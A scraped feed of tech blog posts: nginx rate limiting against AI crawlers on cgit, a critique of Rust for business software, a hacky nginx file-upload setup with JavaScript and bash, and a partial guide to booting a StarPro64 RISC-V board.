    We deployed five additional high-performance servers, ranging from 96 to 48 threads, ensuring cgit had more CPU resources and processes to handle the load efficiently.

    It worked for a few weeks. The servers handled a high load, but we were able to serve users without issues—until the crawlers ramped up their request rates again.

    cgit-last-graph-before

    Note: At this point, we gained another insight—most of the crawlers were coming from South America, Europe, and Asia, while servers in the United States were running smoothly.

    After analyzing the logs again, we identified that the most frequently requested URIs by crawlers were:

    /$repo/(log|plain)/XXXYYY?id=<commit-hash>

    Regular users frequently access /log, and sometimes /plain, but requests to /log or /plain with a specific commit hash are far less common. This led us to the idea of applying rate limiting specifically when a commit hash is included in the request.

    To implement a more complex rate limit that applies only to specific requests, we needed to use access_by_lua_block. This allowed us to apply custom logic based on Nginx location directives with specific parameters, ensuring that only targeted requests were affected.

    However, to use this feature, Lua support must be enabled in Nginx, either by compiling it with the lua-nginx-module or using a pre-built package that includes Lua support.

    The Rate Limit

    limit_conn_status 429;
    limit_req_status 429;
    limit_req_zone $host zone=source_perserver:10m rate=20r/m;
    
    server {
      [...]

    It’s not a rate limit of twenty requests per minute per IP address, but rather per virtual host or hostname that users are accessing.

    location ~ ^/repo-name/(log|plain)/ {
    
      access_by_lua_block {
        local args = ngx.req.get_uri_args()
        if args["id"] then
          --ngx.log(ngx.ERR, "Debug - Redirecting to /limit-aggressive for rate limiting: " .. ngx.var.request_uri)
          return ngx.exec("/limit-aggressive")
        end
      }
    
      # Continue routing regular users through Varnish
      proxy_pass  http://varnish;
      proxy_redirect default;
    }
    
    location /limit-aggressive {
        limit_req zone=source_perserver burst=20;
        proxy_pass  http://varnish;
        proxy_redirect default;
    }

    And then, the load instantly decreased, as shown in the following graph.

    cgit-last-graph-after

    Most importantly, users can still access the web frontend for the Git repositories without any issues.

    To see the rate limiting in action, use tail on the logs and look for 429 responses.

    Final Thoughts

    To the ‘AI’ crawlers out there—whatever you may be—please teach your systems to use git clone when discovering a repository. It’s a simpler and more efficient approach for everyone. [insert khabi meme here]

    – dbaio

    References & Further Reading

    ]]>
    https://blog.sysopscafe.com/posts/ai-crawlers-hammering-git-repos/ hacker-news-small-sites-43223325 Sat, 01 Mar 2025 20:28:15 GMT
    <![CDATA[Is Rust a good fit for business apps?]]> thread link) | @psxuaw
    March 1, 2025 | https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ | archive.org

    While you may hear a lot of harsh words about Rust is this rant, that doesn't have to mean it's a bad language. Rephrasing the classic: there are two types of programming languages: ones that people complain about and ones that nobody uses. I've started my journey with Rust in 2018 and I've been working in it full time since 2021.

    I love Rust a lot for many things: good std lib abstractions, ergonomics (to some extend), the best build toolchain in the world (I've tried many things, but cargo is easily number one across programming languages landscape). But mostly I love how it brought sanity into systems programming and gave a viable alternative to this hollow abomination called C++ (and CMAKE).

    But what do I mean by term business apps? Nowadays, its all sorts of services targeting various kinds of user/asset management, be it a bank portal, online shop or any other sort of ERP systems. This also covers ETL to huge extend, as they bring your focus outside of main concerns that Rust shines in.

    These systems usually have similar shell: a web service providing some API, a database to manage system information and all sorts of other service connectors.

    These systems are characteristic because their main complexity comes from the domain: which is not hardware/software related but it's more about modelling complexities of human interactions in code. Quite often the most performance-sensitive parts related to I/O access (databases, HTTP communication) and serialization and solved by tuning access to the other services we use, not the algorithms we write ourselves.

    These systems where famously written in many different languages, from Python/Ruby/JavaScript/PHP to Java/C#/Go. Question is: are business apps a good use case for Rust?

    Spoilers: in my opinion, No. Now lets explain why.

    Standard library

    One of the nice things about Rust is that its abstractions defined in standard library feel right in size and scope. On the other side, std lib itself is woefully lacking: no RNG, cryptography or serialization. Even some things that should have been language features since day one - like async traits and yield generators - are supplied as 3rd party macros.

    On the other side Rust package ecosystem is enormous. You have everything, from universal abstraction over file system with dozen of services supported, down to cross-platform Bluetooth driver that you can use to (literally) connect to your butt plug.

    While languages such as Go enable you to write pretty much entire HTTP service from standard lib alone, this bazaar-style package management comes with the burden: whenever you need to solve any mundane problem, you land in a space where everything has at least 7 different crates available, but half of them are actually a toy projects and most of them were not maintained for the last 5 years. And don't get me started about audits to check if one of 600 dependencies of your hello world app won't be used for supply chain attacks.

    It takes time and attention to to sift the wheat from the chaff. Attention that is limited and could be put to better use elsewhere.

    And while many of these concerns have sense in systems programming, since they cover very different environments with very slim-tailored constraints - like WASM in the browser or embedded devices where even Rust's minimal standard lib is too much - they don't matter so much in a context of business apps, where solid defaults for common problems are desired: which is one the reasons for Go and .NET popularity in this domain.

    Not abstract enough

    One of the fantastic parts of Rust is that it manged to - mostly - live up to credo of zero-cost abstractions: situation where the performance of your high abstracted code (i.e. iterator ops or futures) is basically the same as their hand-rolled equivalent.

    The problem is that Rust comes with some new concepts like lifetimes and mutability modifiers, that cannot be properly abstracted to the same degree as regular generics.

    If you played with Rust you probably already seen those different kinds of iterators for mutable/immutable references, which basically have the same implementation but require twice the boilerplate code. The reason why is that mutability is not a generic property in Rust and cannot be abstracted over.

    Some languages like Pony offer an ability to control read/write access to fields and variables, but does it in a way that enables safe "casting" between them. PS: I highly recommend learning Pony for its reference capabilities concept alone, which initially may seem to be more complex than Rusts mutability and borrow-checker but in practice is much more robust and avoids many pitfalls that Rust has, especially in multi-threaded programming.

    Dynamic trait references

    Since this rant already came to the topic of abstractions, let's talk about dyn Trait. First, let me praise Rust decision about explicitly showing references responsible for doing a virtual table dispatch in code.

    However Rust also decided to turn Box<dyn Trait>/Arc<dyn Trait> into fat pointers (similar to Go, and opposite to Java/.NET).

    Short explanation: unlike Box<T> which is basically a memory pointer, a memory representation for Box<dyn T> is two pointers - one for type's virtual table, and one for heap address where the corresponding object lives. This comes with few consequences:

    • If you're working with C foreign function interface, there's no right C primitive to support you. You need to rollout something of your own, that most likely won't be compatible with existing solutions. Bizarre design decision given how important native interop is for Rust.
    • If you want to introduce a lock-free mutability via Compare-And-Swap API (like the one that arc-swap offers) and use dynamics at the same time... well, get fucked. You'll need extra layer of indirection, since this API is only available for pointer sized things.
    • Some of the Rust APIs restrict you to work over Sized data - a types which size can be determined at compile time - which unfortunately puts a limitations on your generic params, i.e. if you ever want to use them in Box<T> context (since box pointer will have different size depending on what a T is).

    Rust provides a workaround in form of dedicated crates that offer thin dynamic pointers as well, but since they are not part of standard lib, it's unlikely that you'll be able to use them across different libraries in the ecosystem without extra work.

    Borrow checker: early adopter syndrome

    One of the biggest value proposals of Rust is borrow checker. If you ever thought about reasons to learn Rust: a borrow-checker and ownership model is the one. It changes the way how you think about object graphs.

    Rust is probably the first language that adopted borrow-checker as a regular tool in the non-esoteric language. However it comes with some drawbacks: at its current stage the borrow-checker is still not very advanced and extremely conservative, requiring programmer to do a lot of defensive programming and workarounds in order to make it happy. And most likely it will never be improved beyond minor points, as this would require a breaking change.

    In short: you can imagine borrow-checker as a recursive read/write lock enforced on all fields and variables at compiler level - at any time you can have multiple read-only references to the same object or one read-write reference, but never a mix of two. Additionally in order to have a reference of given type to a field in an object graph, you need to have the same (immutable/mutable) or stronger (mutable) reference to its parent.

    If we think in category of locks, you can imagine a deadlock problem: when A needs to wait for B, and B needs to wait for A to acquire their corresponding locks. In Rust borrow-checker, such situations are compiler errors. The same logic is used by Rust to operate on actual locks, but don't worry: it doesn't mean that Rust is deadlock free language.

    What it means however, is that there's no easy way to represent cyclic data structures in Rust (here's description of famous double-linked list problem), since - unlike pretty much any other language - it explicitly disallows you to have two mutable/immutable references to the same variable (even in the same thread).

    And speaking of cyclic data structures: you can actually sometimes implement them in straight forward manner with Rc<RefCell<T>>/Arc<Mutex<T>>, but the problem is that:

    1. RefCells can easily blow up since they work the same way like borrow-checker, but during runtime, while Mutex can deadlock at runtime. Neither of them is "zero cost".
    2. You need to keep track of references with strong and weak pointers, which is usually not an issue unless your object graph needs to be a bit more complicated for some reason. If not, you'll get a memory leak. One of the Rust promises was to reduce these, but it only works in comparison to traditional "systems" languages like C/C++. This comparison falls apart against managed languages.

    I get why it's there, but forcing it blindly and everywhere as a default behaviour is fucking bullshit: which apparently is acknowledged by the authors themselves, since the common way of getting immutable/mutable reference from an array is to split it into two separate references using method that operates using unsafe pointers under the hood. Shutout to all haters saying that unsafe Rust is not idiomatic: it's not only idiomatic, it's necessary.

    Borrow checker and encapsulation

    Another thing about borrow checker is that it has very shallow understanding of your code. It also explicitly makes a conservative assumption that if you call method over some reference, this method will try to access ALL fields of that references, forcing any other field accessed outside of it to be invalidated.

    Let's check this out on a following example:

    struct X {
        commit_offset: usize,
        entries: HashMap<u32, Vec<Entry>>,
        changed: HashMap<u32, Vec<usize>>,
    }
    
    impl X {
        fn change_uncommitted<F>(&mut self, client: &u32, f: F)
            where F: Fn(&mut Entry) -> bool 
        {
            let mut i = self.commit_offset;
            if let Some(entries) = self.entries.get_mut(client) {
                // get iterator over uncommitted entries for given client
                for e in entries.as_mut_slice()[self.commit_offset..].iter_mut() {
                    if f(e) {
                        let changed = self.changed.entry(*client).or_default();
                        changed.push(i);
                    }
                    i += 1;
                }   
            }
        }
    }
    

    Now let's try encapsulate it a little to make it more readable - nothing much, just encapsulate our cryptic for iterator statement to give it some context:

    impl X {
    	/// get iterator over uncommitted entries for given client
        fn get_uncommitted(&mut self, client: &u32) -> Option<&mut [Entry]> {
            let e = self.entries.get_mut(client)?;
            Some(&mut e.as_mut_slice()[self.commit_offset..])
        }
        
        fn change_uncommitted<F>(&mut self, client: &u32, f: F)
            where F: Fn(&mut Entry) -> bool 
        {
            let mut i = self.commit_offset;
            if let Some(entries) = self.get_uncommitted(client) {
                for e in entries.iter_mut() {
                    if f(e) {
    	                /// compilation failure: get_committed already borrowed
    	                /// `&mut self` in a scope of if let, so we cannot access
    	                /// `self.changed`
                        let changed = self.changed.entry(*client).or_default();
                        changed.push(i);
                    }
                    i += 1;
                }   
            }
        }
    }
    

    The second implementation will fail. Not because it's wrong, not because we broke something (in fact these two implementations are identical), but because it makes borrow checker sad.

    This is in fact recurring theme: when working in Rust, you'll often find yourself in situation when you need to split your types or methods in specific way, just because borrow checker says so. It's mandatory, even when it adds no value (or straight up removes it) to your project.

    Performance ceiling vs time to performance

    One of the common misconceptions about Rust is that apps written in Rust are fast because they are written in Rust. This is true to some extent if we compare them against dynamic languages like Python, Ruby or JavaScript, but it falls short when we start comparison with services written in i.e.. Go, Java or .NET.

    This is may be due to oversimplified view on the performance characteristics of real-world apps:

    1. Winning hyper optimization wars in micro-benchmarks rarely translate to visible results in business apps, where our own code is usually ~10% of the overall executed: rest is databases, web stacks, serializers etc.
    2. For those apps most of the optimizations are either done by proper database and network usage, system architecture and right algorithm pick. Language wrestling matters a lot less, at least when we talk about languages in the same performance "weight class".

    Moreover, picking Rust may cause a let-down in expectations about performance - I've seen people writing their apps in both Rust and i.e.. C# and noticing that their C# apps were actually faster. This again comes from another issue: when you first try, you probably will write your Rust app just well enough to make it compile, do actual task and avoid glaring performance issues. Most likely you'll stick to its defaults and - in business setting - this will be the last time when you try to optimise that piece of code.

    This boils down to the difference between:

    • Performance ceiling which means how possibly fast program written in a given language can be. This is usually low for dynamic languages (since they abstract a lot) but it's very high for Rust. However some platforms, i.e.. .NET or Swift where we can choose to work closer to the metal if we want to, this difference is not that significant.
    • Time to performance which basically means: "how long it takes to solve a problem with acceptable performance". And personally: Rust falls behind many managed languages on that metric, mainly because of things like borrow checker, and multi-threading issues etc. which I cover later.

    Your business app will probably be working over things like strings, byte buffers and object graphs to carry over business data between DB and web framework. This will mean that it will move and copy a lot of data around: something that default Rust primitives are not particularly great at ie. String::clone in Rust uses deep copy (where in managed languages it's just pointer copy), while String itself is just wrapper around capacity-bound Vec<u8> which means they may also be bigger than they need to be.

    Copying "references" can be much more expensive than in languages with managed memory because of ref-based garbage collector: i.e. for Vec<Arc<T>> means not only memcpy over vector heap space but also following increment of ref counters in every of the nested Arc pointers (including loading each of them from heap into register and coordinating new counter values between CPU caches).

    And since we're at Arc/Rc or even Box: once you need to deal with graphs of objects or moving data in between coroutines or threads, you'll see yourself using them quite a lot. The problem is that this technique of allocating is nowhere near as fast as bump pointer allocators that managed languages use. The actual win here is when we need to release memory: which in Rust doesn't introduce GC pauses. However modern runtimes i.e. Go or Java Z collector, can provide a constrained GC pauses that let us keep the latency in check to avoid pathological cases (which is fine enough for most business apps, except maybe HFT space). Moreover they can offset memory release to background threads, which is not the case in Rust and for big object graphs can also affect latency.

    And while technically Rust memory footprint would be expected to be lower, in practice that doesn't have to be the case (because of all the deep copying of heap objects and the fact that many of Rust pointers are pinned, causing fragmentation).

    Rust is NOT good for multi-threaded apps

    Some developers like to claim that - thanks to its strict borrow checker - Rust makes multi-threaded programming safe and reliable. This statement could probably hold in comparison against languages like C/C++, but once again it easily falls apart once you compare it against any of the contenders we described already.

    .await pain

    First problem is: building multi-threaded apps in Rust is simply painful. 2/3 of this pain comes from the fact that if you ever will have to do it, you'll most probably be put to work with async/await and tokio runtime.

    Once you need to work with Rust futures and async code, you'll get exposed to whole new world of dosing micro-complexities into your brain, i.e.:

    • How you cannot just access objects and their fields, but have to work with pinning and Unpin.
    • How to build async iterators: because while async_stream is there, from time to time you'll have to roll something by hand: and it's much harder process than any other language supporting this feature that I know of.
    • Differences between regular threads/locks, and their asynchronous equivalents.
    • Why the hell do you need async_trait and why it's even configurable.
    • How Send and Sync makes each of the issues above exponentially harder than they already are.
    • And how the fact that you have pluggable runtimes - and sometimes need to use more than one in your app, i.e.. tokio+rayon - makes things even more interesting.

    I think that this blog post is a good critique of current state of async Rust.

    If you're going to pass your objects across threads, Rust forces some constrains over the code you're writing - such as Send + 'static limitations - even if that code is executed in only a single execution scope at the time. The problem is that in tokio - a dominant runtime used in Rust ecosystem - a primary way of parallelizing work is via spawn method, that uses work-stealing scheduler: which moves the suspended executions from busy to idle threads as it seems fit. This usually requires ensuring that most of your async code base is Send + 'static compatible.

    What's nice about Send and Sync traits is that they are inferred from bodies of async methods that you implement. What's not nice is that they are not immediately visible, so you may accidentally break API guarantees by changing few lines somewhere down in a method call stack without even noticing, resulting in your methods no longer being forkable by tokio::spawn.

    Locks. Locks everywhere.

    In practice all of the Send + 'static' constraints mentioned above mean that all kinds of shared data now needs to be wrapped with Arc<Mutex<T>>/ Arc<RwLock<T>>. But which mutexes and locks are we talking about?:

    • Of course since std::sync::RwLock is basically a wrapper around OS primitives, it makes it very heavy. Most notably it doesn't cover async/await API, so it's going to block the threads from tokio thread pool, which is damaging for a server performance.
    • parking_lot::RwLocks are much more lightweight - since they use optimistic locking with atomic counters. They still don't offer async/await API though, potentially blocking thread pool in the process.
    • futures_locks::RwLock which sounds like a good idea if you aim for have runtime-agnostic async locks, until you look into the implementation and realize that it's just bait and the whole thing is using regular locks inside.
    • Tokio has its own RwLock which offers async/await API but it comes with some caveats, like:
      • If you use blocking lock methods inside of a context in which tokio runtime is available, it will straight up panic, crashing your app. And sometimes you just may have to call it in a context where runtime is available but your code cannot be async, calling for another layer of workarounds.
      • It doesn't offer reentrancy or upgradeable locks (promoting read locks into write ones).
    • Finally async_lock::RwLock which offers async/await API, optimal implementation, lock upgrades and doesn't crash your server because the author didn't like the way you're using his library. PS: don't worry I don't like it either, but I'm here to do what I can with what I have in hands, not to write poetry.

    So once you finally get your PhD from lock algorithms in Rust, you finally are at the level where you can do the job as efficiently as Go dev after learning the whole language in 2 hours. And god forbid ask yourself a question: why do I need to use locks if this code is never accessed concurrently?

    The best part is that - unlike ie. Pony - Rust compiler doesn't guarantee absence of dead locks in your code. Even better: since locks are so wide spread, they are even more likely to occur. It doesn't even have to happen because you're using them wrong, just because you didn't know that the code that you're calling is using them somewhere below (sending changes over tokio::watch channel itself is a great example of that).

    Actors

    One of the stunning issues I've found in Rust is that, given how well borrow-checker ownership matches the actor model, the actor libraries in Rust are lacking. I'm not talking about all of them, since I didn't have a time nor energy to check out every out of 47 actor libraries listed for a good start, but that number strongly suggests syndrome where after first few every new attempt was trying to solve some issues with existing implementation, creating new ones in the process. If you're using them for your business app, most likely it will be one of the 3 most popular, and most likely it will be actix, because you've been baited by its popularity and pretty mature web framework attached to it.

    The problem with Actix is that its core has been defined before the era of async/await Rust. This means that it doesn't natively support async actor methods - and if you need a server app doing any kind of I/O, you WILL have to use async Rust eventually. Eventually some support for async had been added, but now you need to educate yourself which of the 4 different responses that suport futures should be used in which situation. AFAIK none of these support using &mut self actor in async method (and we don't count actix_async_handler since it has list of limitations longer than the actual documentation). It's about as handy as using a knife with 4 different blades but no handle.

    In practice, the most popular pattern I've seen was simply using a tokio channel combined with tokio::spawn, which essentially is a retarded cusin of actor: more verbose and missing all of its benefits like structured message handling, lifecycle management, state encapsulation, parent-children hierarchies etc.

    Panics

    While Rust errors are pretty safe - thanks to being a part of method declaration - they are not alone: panics are still there. And unlike errors, you'll never be 100% sure that you're avoided all of them. Technically you could use some way to notify about their existence i.e.. by using unsafe brackets or something, but in practice it's hard to be sure.

    One of the issues are ever-present .unwrap calls. Technically they are meant to be used with caution, but if you're glossing over the code base, the only difference between hash_map.get().unwrap() (which can happen often) and path_buf.to_str().unwrap() (which most likely will never happen in your app) is your experience.

    Other issues include:

    • Panics on index accesses.
    • Panics of double borrow/borrow_mut from RefCells - which are perfectly fine in many languages but in Rust will crash your entire app because borrow checker doesn't like second guesses.
    • Panics with stack overflows because the state machines generated by your async methods may be a "bit" bigger than expected: but at least no code has been heap-alloc'ed while solving this problem.

    What's important to notice here: we're talking about panics that will crash your server, affecting not only the current request handle but everyone using your services. That's the major difference between Rust failures and exceptions used in managed languages. And sure you could say that these can be fixed with proper programmer discipline, but isn't the Rust promise of compiler taking care of dangerous coding mistakes the reason why we put and effort to learn it and deal with all of the borrow-checker bullshit along the way?

    Death by a thousand cuts

    Individually the issues above can often be easily solved with some of the experience, and casted off as a "skill issue". But together they build up into developer's mental fatigue: you're here to solve business problems, yet on every step you need to solve "plumbing issues", make decisions about memory model including possible feature changes and refactoring they'll require in the future. Each one of them is considered crucial by borrow checker to a point where it either cause compilation error or runtime panic.

    There are places where fine-grained control over program memory and performance tuning is beneficial and can be one of the business goals: these are things from broad area of system engineering. However for your daily ERP app the complexity coming from trying to reflect real-life interactions with all their exceptionality and imprecisions is enough: you're not going to be praised because your asset management app takes 10% less CPU while the task backlog has doubled in the meantime.

    So if you're a founder or developer thinking if you should use Rust for your next business project because some crypto start-up is developing their quasi-bank in it and it would look nice in your resume, please think twice and don't make regrettable decision for yourself and your colleagues.

    ]]>
    https://www.bartoszsypytkowski.com/is-rust-a-good-fit-for-business-apps/ hacker-news-small-sites-43223093 Sat, 01 Mar 2025 20:04:29 GMT
    <![CDATA[Nginx Explorer – Upload]]> thread link) | @todsacerdoti
    March 1, 2025 | https://blog.izissise.net/posts/ngxp-upload/ | archive.org

    After listing files and setting up per directory accesses, we would like to allow some users to upload files.

    This solution is very hacky, but it has the advantage of requiring only a standard nginx server and a bit of javaScript.

    First, we define our upload endpoint:

    ...
    server {
        ...
        location ^~ /___ngxp/upload/ {
            limit_except GET POST     { deny all; }
            if ($user_authorized = 0) { return 401; }  
    
            client_body_temp_path      /home/user/uploads/; 
            client_body_in_file_only   on; 
            client_body_buffer_size    16m;
            client_max_body_size       256m;
            client_body_timeout        2h;
            proxy_set_body             off; 
            proxy_set_header           X-fileno "$upload_fileno"; 
            proxy_pass                 http://[::1]:4000/$request_method;
        }
    }
    
    map $request_body_file $upload_fileno { 
        ~([^\/]*)$ $1; 
        default    "";
    }
    

    client_body_temp_path will store request bodies at the specified path on the file system. However, nginx will actually do so only if there is a proxy_pass defined.

    To work around this, we define another server that listens only on localhost. With proxy_set_body off;, the body will not actually be sent to the proxy.

    server {
        listen [::1]:4000;
        location /POST { return 201 "$http_x_fileno"; }
        location /GET  { return 200 "ngxp upload"; }
    }
    

    Nginx will create an ever incrementing numbered file for every request body, the increment is non predictable thanks to nginx true randomness1.

    To upload files larger than client_max_body_size and preserve the original filename for the administrator, we'll have to write some client side code.

    Using javascript, we can upload a file with an XHR request, and split the file into chunks. Conveniently, browser File objects have a slice function.

    We also send a meta file to allow the server operator to reconstruct the file from its chunks. This file includes metadata such as a magic header, chunk size, chunk count, the size of the last chunk and the filename of each chunk on the server as sent back by nginx (X-fileno).

    
    Array.from(files).forEach((f) => {
        var chunk_cnt = 1;
        var chunk_size = f.size;
        var chunk_last_size = 0;
        if (upload_max_size > 0 && f.size > upload_max_size) {
    
            chunk_cnt = f.size / upload_max_size | 0;
            chunk_size = upload_max_size;
            chunk_last_size = f.size % upload_max_size | 0;
            if (chunk_last_size > 0) {
                chunk_cnt += 1;
            }
        }
        var promise_chain = Promise.resolve(([null, []]));
        for (var i = 0; i < chunk_cnt; i++) {
            var chsz = chunk_size;
            if ((seeker + chsz) > f.size) {
                chsz = chunk_last_size;
            }
            let chunk = f.slice(seeker, seeker + chsz); 
            seeker += chsz;
            promise_chain = promise_chain.then(([xhr, chunk_fileno]) => {
                if (xhr !== null) {
                    chunk_fileno.push(xhr.responseText);
                }
                return upload(upload_endpoint, chunk, chunk_fileno);
            });
        }
    
        return promise_chain.then(([xhr, chunk_fileno]) => {
            if (xhr !== null) {
                chunk_fileno.push(xhr.responseText);
            }
            var meta = meta_info(f, chunk_cnt, chunk_size, chunk_last_size, chunk_fileno);
            return upload_func(
                upload_endpoint, meta, chunk_fileno
            );
        }).then(upload_success, upload_error);
    });
    

    With the promise_chain, each chunk of the file will be uploaded one after the other!

    The chunks will be waiting until they are reassembled.

    Once a file is upload we're left with numbered files in the previously specified directory.

    We can reconstruct the original files by searching for all files that start with the marker value #ngxpupload_meta. With this meta file, we find all chunks of a file and concatenate them into a file named $name. Finally, we remove all used chunks.

    find "$1" -type f | while read -r h; do
        if [ ! -f "$h" ]; then continue; fi                                                    read -r -n 16 head < "$h" || true                                                      if [ "$head" != "#ngxpupload_meta" ]; then continue; fi                                IFS='/' read -r name chk_cnt chk_sz chk_lsz < <(
            jq -Rr 'fromjson? | [(.name | sub("/";"_";"g")), (.chunk_cnt|tonumber), (.chunk_size|tonumber), (.chunk_last_size|tonumber)] | join("/")' "$h"
        )     eval "chk_fileno=( $( jq -Rr --arg d "$1" 'fromjson? | .chunk_fileno[] | select(test("^[0-9]*$")) | "\($d)\(.)" | @sh' "$h" ) )"
        stats=$(stat -c '%n %s' "$h" "${chk_fileno[@]}" | sort | uniq -f1 -c)
        stats=${stats% [0-9]*}
        stats=${stats// }
        stats=${stats//$'\n'}
        expected="$(( chk_cnt - ( chk_lsz > 0 ) ))${chk_fileno[0]}${chk_sz}"
        if (( chk_lsz > 0 )); then
            expected+="1${chk_fileno[-1]}${chk_lsz}"
        fi
        [ "$stats" = "${expected}1${h}" ] || { echo "$h meta invalid" >&2; break; }
        cat "${chk_fileno[@]}" > "$name"
        rm -f "$h" "${chk_fileno[@]}"
    done
    

    That's the gist of how nginx explorer uploads work!

    There are a lot of other cool features in the UI part that I've not wrote about yet and some I've yet to implement.

    Don't hesitate to go look at the project page and test nginx explorer ./ngxp.sh servethis.

    ]]>
    https://blog.izissise.net/posts/ngxp-upload/ hacker-news-small-sites-43222545 Sat, 01 Mar 2025 19:09:52 GMT
    <![CDATA[StarPro64 EIC7700X RISC-V SBC: Maybe LLM on NPU on NuttX?]]> thread link) | @lupyuen
    March 1, 2025 | https://lupyuen.org/articles/starpro64.html | archive.org

    📝 2 Mar 2025

    StarPro64 EIC7700X RISC-V SBC: Maybe LLM on NPU on NuttX?

    StarPro64 EIC7700X is the (literally) Hot New RISC-V SBC by PINE64. In this article we chat about…

    • ESWIN EIC7700X, the RISC-V SoC inside StarPro64

    • Its Neural Processing Unit (NPU) that supports Large Language Models (LLM)

    • Booting RockOS Linux on StarPro64

    • Porting Apache NuttX RTOS to StarPro64

    • How LLM on NPU on NuttX might work

    • Multiple Harts are a little problematic

    • Beware of Overheating!

    • Smart Power Plug might be helpful

    We begin with the RISC-V SoC…

    (Watch the NuttX Demo on YouTube)

    (Thanks to PINE64 for providing the Prototype StarPro64)

    StarPro64 EIC7700X RISC-V SBC

    StarPro64: Isn’t it a souped-up Star64?

    Nope it’s a totally different beast! (From a different SoC Maker)

    Inside StarPro64 is the ESWIN EIC7700X SoC. EIC7700X has Four RISC-V Cores and it’s based on SiFive Architecture (a bit like JH7110 SoC)

    ESWIN EIC7700X SoC

    But its super-speedy Neural Processing Unit (NPU) makes it a very special (llama?) beast. Later we’ll talk about the Fun LLM Experiments that we can run on the NPU.

    (20 TOPS INT8 = 20 Trillion Ops Per Second for 8-bit Integers)

    ESWIN EIC7700X NPU

    EIC7700X Technical Reference Manual is probably the best among the RISC-V SoCs (BL808, SG2000, JH7110)

    We go hands-on…

    Connecting USB UART Dongle to StarPro64

    What happens if we boot StarPro64? Fresh from the box?

    We monitor the UART0 Port for Debug Messages. Connect our USB UART Dongle (CH340 or CP2102) to these pins (pic above)

    StarPro64USB UARTColour
    GND (Pin 6)GNDYellow
    TX (Pin 8)RXBlue
    RX (Pin 10)TXGreen

    (Same Pins as the GPIO Header on Oz64 SG2000 and Star64 JH7110)

    Connect to the USB UART at 115.2 kbps

    screen /dev/ttyUSB0 115200

    Power up the board with a Power Adapter. (Same one as Star64 JH7110)

    We’ll see OpenSBI

    OpenSBI v1.5
       ____                    _____ ____ _____
      / __ \                  / ____|  _ \_   _|
     | |  | |_ __   ___ _ __ | (___ | |_) || |
     | |  | | '_ \ / _ \ '_ \ \___ \|  _ < | |
     | |__| | |_) |  __/ | | |____) | |_) || |_
      \____/| .__/ \___|_| |_|_____/|____/_____|
            | |
            |_|
    Platform Name             : ESWIN EIC7700 EVB
    Platform Features         : medeleg
    Platform HART Count       : 4
    Platform Console Device   : uart8250
    Firmware Base             : 0x80000000
    
    Domain0 Boot HART         : 2
    Domain0 HARTs             : 0*,1*,2*,3*
    Domain0 Next Address      : 0x0000000080200000
    
    Boot HART ID              : 2
    Boot HART Base ISA        : rv64imafdchx
    Boot HART ISA Extensions  : sscofpmf,zihpm,sdtrig
    Boot HART MIDELEG         : 0x0000000000002666
    Boot HART MEDELEG         : 0x0000000000f0b509

    Then U-Boot Bootloader

    U-Boot 2024.01-gaa36f0b4 (Jan 23 2025 - 02:49:59 +0000)
    CPU:     rv64imafdc_zba_zbb
    Model:   ESWIN EIC7700 EVB
    DRAM:    32 GiB (effective 16 GiB)
    llCore:  143 devices, 31 uclasses, devicetree: separate
    Warning: Device tree includes old 'u-boot,dm-' tags: please fix by 2023.07!
    MMC:    sdhci@50450000: 0, sd@50460000: 1
    
    Loading Environment from SPIFlash...
    SF: Detected w25q128fw with page size 256 Bytes, erase size 4 KiB, total 16 MiB
    *** Warning - bad CRC, using default environment
    No SATA device found!
    Hit any key to stop autoboot:  0
    =>

    And it stops at U-Boot, waiting to boot from MicroSD or eMMC. Let’s init our eMMC…

    (See the Boot Log)

    HDMI Output will show U-Boot, but not OpenSBI

    HDMI Output will show U-Boot, but not OpenSBI

    Is there a Linux Image for StarPro64?

    The fine folks at PLCT Lab RockOS are busy preparing the Linux Image for StarPro64. Thanks to @icenowy, we have a Preview Version of the Linux Image…

    1. Bootloader (OpenSBI + U-Boot)

      bootloader_secboot_ddr5_pine64-starpro64.bin

    2. Linux Boot Image (Linux Kernel)

      boot-rockos-20250123-210346.ext4.zst

    3. Linux Root Image (Linux Filesystem)

      root-rockos-20250123-210346.ext4.zst

    Uncompress the files and rename them. Copy them to a USB Drive (not MicroSD)

    $ ls -lh *.bin *.zst
    4.2M  bootloader_secboot_ddr5_pine64-starpro64.bin
    154M  boot-rockos-20250123-210346.ext4.zst
    2.3G  root-rockos-20250123-210346.ext4.zst
    
    $ unzstd boot-rockos-20250123-210346.ext4.zst
    boot-rockos-20250123-210346.ext4.zst: 524288000 bytes
    
    $ unzstd root-rockos-20250123-210346.ext4.zst
    root-rockos-20250123-210346.ext4.zst: 7516192768 bytes
    
    $ mv boot-rockos-20250123-210346.ext4 boot.ext4
    $ mv root-rockos-20250123-210346.ext4 root.ext4
    
    $ ls -lh *.bin *.ext4
    4.2M  bootloader_secboot_ddr5_pine64-starpro64.bin
    500M  boot.ext4
    7.0G  root.ext4
    
    $ cp *.bin *.ext4 /media/$USER/YOUR_USB_DRIVE

    We’ll skip the MicroSD Image, because MicroSD Interface wasn’t working reliably on our Prototype StarPro64.

    StarPro64 with eMMC

    How to load the Linux Image into eMMC?

    Based on the ESWIN Official Doc

    1. Connect our eMMC to StarPro64 (pic above)

    2. Connect our USB Drive (Previous Section)

    3. At U-Boot: Press Ctrl-C until U-Boot stops

    4. Verify that the eMMC is OK

      $ ls mmc 0
      [ Nothing ]
      
      $ mmc part
      [ Nothing ]
    5. First Time Only: GPT Partition our eMMC…

      $ echo $partitions
      partitions=
        name=boot,start=1MiB,size=2048MiB,type=${typeid_filesystem},uuid=${uuid_boot};
        name=swap,size=4096MiB,type=${typeid_swap},uuid=${uuid_swap};
        name=root,size=-,type=${typeid_filesystem},uuid=${uuid_root}
      
      $ run gpt_partition
      $ mmc part
        1 0x00000800 0x001007ff "boot"
        2 0x00100800 0x009007ff "swap"
        3 0x00900800 0x0e677fde "root"
    6. Verify that our USB Drive works…

      $ ls usb 0
       524288000 boot.ext4
      7516192768 root.ext4
         4380760 bootloader_secboot_ddr5_pine64-starpro64.bin   
    7. Install the Bootloader, Boot Image and Root Image, from USB Drive to eMMC…

      $ es_fs update usb 0 boot.ext4 mmc 0:1
      mmc has been successfully writen in mmc 0:1
      
      $ es_fs update usb 0 root.ext4 mmc 0:3
      mmc has been successfully writen in mmc 0:3
      
      $ ext4load usb 0 0x100000000 bootloader_secboot_ddr5_pine64-starpro64.bin
      4380760 bytes read in 162 ms (25.8 MiB/s)
      
      $ es_burn write 0x100000000 flash
      bootloader write OK

      (See the eMMC Log)

    8. Beware of Overheating! Keep StarPro64 cool, or the previous step might corrupt the SPI Boot Flash and cause unspeakable agony…

